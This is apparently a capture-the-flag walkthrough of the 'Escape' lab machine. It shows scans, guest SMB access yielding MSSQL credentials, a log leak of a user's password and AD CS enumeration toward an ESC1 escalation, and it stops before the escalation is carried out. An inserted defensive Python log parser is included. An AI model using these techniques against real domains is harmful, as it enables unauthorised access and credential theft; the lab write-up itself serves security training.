Escape is a Medium difficulty Windows Active Directory machine that starts with an SMB share from which guest-authenticated users can download a sensitive PDF file. Inside the PDF file, temporary credentials are available for accessing an MSSQL service running on the machine. An attacker is able to force the MSSQL service to authenticate to their machine and capture the hash. It turns out that the service is running under a user account and the hash is crackable. Having a valid set of credentials, an attacker is able to get command execution on the machine using WinRM. Enumerating the machine, a log file reveals the credentials for the user ryan.cooper. Further enumeration of the machine reveals that a Certificate Authority is present and one certificate template is vulnerable to the ESC1 attack, meaning that users who are eligible to use this template can request certificates for any other user on the domain, including Domain Administrators. Thus, by exploiting the ESC1 vulnerability, an attacker is able to obtain a valid certificate for the Administrator account and then use it to get the hash of the Administrator user.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn -oN Nmap/udp-scan
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $ nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 17:36:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-03T17:33:04
|_Not valid after: 2054-11-03T17:33:04
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-03T17:39:50+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Summary
* Open ports: 53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - Kerberos - RPC - SMB - LDAP - LDAPS - MSSQL - WinRM - NTP
* Important notes: DNS: dc.sequel.htb - Domain: sequel.htb - Microsoft SQL Server 2019
hosts file
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $sudo sh -c "echo '$ip dc dc.sequel.htb sequel.htb ' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $tail -n1 /etc/hosts
10.10.11.202 dc dc.sequel.htb sequel.htb
Kerberos Enumeration
I started my enumeration process by brute-forcing Kerberos, since I need a domain account to attack the box and there is no web server here, but with no luck.
I then moved to the SMB and RPC services, looking for misconfigurations in shared-folder permissions or RPC. I found I had READ access on the Public share and no access to RPC.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
The result was NT_STATUS_ACCESS_DENIED.
I connected to the share and downloaded a PDF file from it.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $impacket-smbclient sequel.htb/guest:''@dc
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
# use Public
# ls
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 .
drw-rw-rw- 0 Sat Nov 19 06:51:25 2022 ..
-rw-rw-rw- 49551 Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf
# get SQL Server Procedures.pdf
After opening the file, I noticed there were credentials at the end of it.
Foothold
PublicUser:GuestUserCantWrite1
I can access the database with these creds :))
When I deal with MSSQL, I work through a checklist of possible attack paths, so I will create one:
* Check for admin access
* Check the databases for juicy info and secrets
* Check the possibility of capturing the MSSQL service account's hash
Under C:\SQLServer\Logs there is a .bak file containing the logs of the MSSQL instance. What is interesting is that I find Ryan.Cooper failing to log in, immediately followed by a failed login for the "user" NuclearMosquito3, which looks like a password typed into the username field. Maybe I can use this string as a password.
*Evil-WinRM* PS C:\SQLServer\Logs> dir
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK
..snip..
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
..snip..
And the password is correct :))
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
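As an added example (not part of the original writeup), here is a small Python parser for the ERRORLOG format shown above that pairs a failed domain logon with an immediately following failed logon whose "username" is not an account, which is the exact pattern that leaked Ryan.Cooper's password here; the log lines are constructed in that format, not the box's full file.

```python
import re
from datetime import datetime

# Constructed sample lines in the layout of the ERRORLOG.BAK excerpt above (not the box's full file).
SAMPLE_LOG = """\
2022-11-18 13:43:05.12 Logon       Login succeeded for user 'sequel.htb\\sql_svc'. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:00.00 Logon       Logon failed for user 'PublicUser'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.14.5]
"""

FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) +Logon +"
    r"Logon failed for user '(?P<user>[^']*)'\. Reason: (?P<reason>.*?) \[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_failed_logons(text):
    """Return every 'Logon failed' event as a dict with a parsed timestamp."""
    events = []
    for line in text.splitlines():
        m = FAILED.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append(ev)
    return events

def find_leaked_secrets(text, window_seconds=5):
    """Flag a failed logon whose 'user' is not DOMAIN\\user or user@domain when it follows,
    from the same client and within window_seconds, a failed logon for a real account:
    the classic symptom of a password typed into the username field.
    Returns (account, probable_secret, client) tuples."""
    leaks, prev = [], None
    for ev in parse_failed_logons(text):
        is_account = "\\" in ev["user"] or "@" in ev["user"]
        if (not is_account and prev is not None and prev["client"] == ev["client"]
                and (ev["ts"] - prev["ts"]).total_seconds() <= window_seconds):
            leaks.append((prev["user"], ev["user"], ev["client"]))
        prev = ev if is_account else None
    return leaks

if __name__ == "__main__":
    for account, secret, client in find_leaked_secrets(SAMPLE_LOG):
        print(f"possible credential leak for {account} from {client}: redact '{secret}' from the log")
```

Running this over a real ERRORLOG (or shipping the same rule to a SIEM) lets a defender catch such leaks before a log backup ends up readable on disk.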
Privilege Escalation
I accessed the machine as Ryan and found that he is a member of the Certificate Service DCOM Access group.
Since this group exists, I need to enumerate the domain's PKI. A CA named sequel-DC-CA is found in the domain.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Escape]
└──╼ $nxc ldap dc -u Ryan.Cooper -p NuclearMosquito3 -M adcs
LDAPS 10.10.11.202 636 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
ADCS 10.10.11.202 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.202 389 DC Found PKI Enrollment Server: dc.sequel.htb
ADCS 10.10.11.202 389 DC Found CN: sequel-DC-CA
Then, I looked for vulnerable templates as possible escalation paths (ESC).